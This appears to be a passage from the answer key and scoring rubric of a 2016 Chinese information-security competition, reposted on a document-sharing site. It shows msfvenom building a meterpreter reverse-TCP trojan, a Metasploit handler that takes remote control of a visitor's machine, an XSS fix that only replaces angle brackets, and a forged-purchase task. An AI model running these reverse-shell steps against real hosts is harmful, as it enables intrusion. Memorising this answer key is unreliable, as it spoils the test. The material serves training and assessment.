好文档 - 专业文书写作范文服务资料分享网站

2016信息安全管理与评估赛项赛题与评分标准—第二阶段答案及评分标准

天下 分享 时间: 加入收藏 我要投稿 点赞

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

正向查找区域:主机(截图) Zone:Org 主机:hacker

Metasploit Framework:TrojanHorse.exe生成 (3分) root@bt:~#Ifconfig (截图)

显示Kali IP地址:

截图包含:

root@bt:~#msfvenom –p windows/meterpreter/reverse_tcp LHOST= LPORT=80 –f exe –o trojanhorse.exe

5. 当\ Employee Message Board\页面的访问者执行网站()中的木马程序TrojanHorse.exe以后,访问者主机需要被Kali主机远程控制,打开访问者主机的CMD.exe命令行窗口,并将该操作过程截图;(5分)

11

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

Metasploit Framework:Hacker Reverse Tcp连接客户端 (2分)

root@bt:~#msfconsole

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST LHOST =>

msf exploit(handler) > set LPORT 80 LPORT => 80

msf exploit(handler) > exploit [*] Started reverse handler on [*] Starting the payload handler... (截图中包含黄色部分)

访问者主机需要被Kali主机远程控制(3分) Kali MSF提示(截图)包含如下信息 Kali IP: 访问者主机IP:

[*] Sending stage (…… bytes) to

[*] Meterpreter session 1 opened ( -> at …… meterpreter >

12

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

Kali截图包含打开访问者主机的CMD.exe命令行窗口;

6. 进入DCST中的WebServ2003服务器的C:\\AppServ\\www目录,找到insert.php程序,使用EditPlus工具分析并修改PHP源程序,使之可以抵御XSS渗透测试,并将修改后的PHP源程序截图;(10分) (10分)

在服务器场景原insert.php程序语句$info=$_REQUEST[‘message’]后加入:

绿色部分,通过替换函数,通过其它字符({},(),[]等字符)替换字符“<”和“>”均可得分; $info=str_replace(“<”,”(”,$info); $info=str_replace(“>”,”)”,$info); 或

$info=str_replace(“<”,”{”,$info); $info=str_replace(“>”,” }”,$info); 或

$info=str_replace(“<”,”[”,$info);

13

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

$info=str_replace(“>”,” ]”,$info);

7. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对该DCST中的WebServ2003服务器进行XSS渗透测试无效,并将验证过程截图;(5分)

SQL Server企业管理器中,Message表中info字段注入语句符号“<”和“>”被替换为上一题替换后的字符;同时Communication Message页面显示Content:注入语句符号“<”和“>”被替换为上一题替换后的字符; (5分)

8. Web访问DCST中的WebServ2003服务器,\ Shopping Hall\,分析该页面源程序,找到提交的变量名,并截图;(5分)

找到源程序:(2分)

14

文档来源为:从网络收集整理.word版本可编辑.欢迎下载支持.

页面标题为:

Shopping Hall

找到提交的变量名:(3分) goods=keyboard&quantity=1 goods=mouse&quantity=1 goods=monitor&quantity=1 goods=cpu&quantity=1 goods=memory&quantity=1 goods=dvdrom&quantity=1

9. 对该任务题目1页面注入点进行渗透测试,使\ Employee Message Board\页面的访问者向页面ShoppingProcess.php提交参数goods=cpu&quantity=999999,查看\页面,并将注入代码及测试过程截图;(5分) 构造注入代码:(2分)

  • 正文标题

  • 上下篇章

  • 相关推荐

  • 精选图文

8od5i96kh36h1tx45d7638ccg96n4k006z4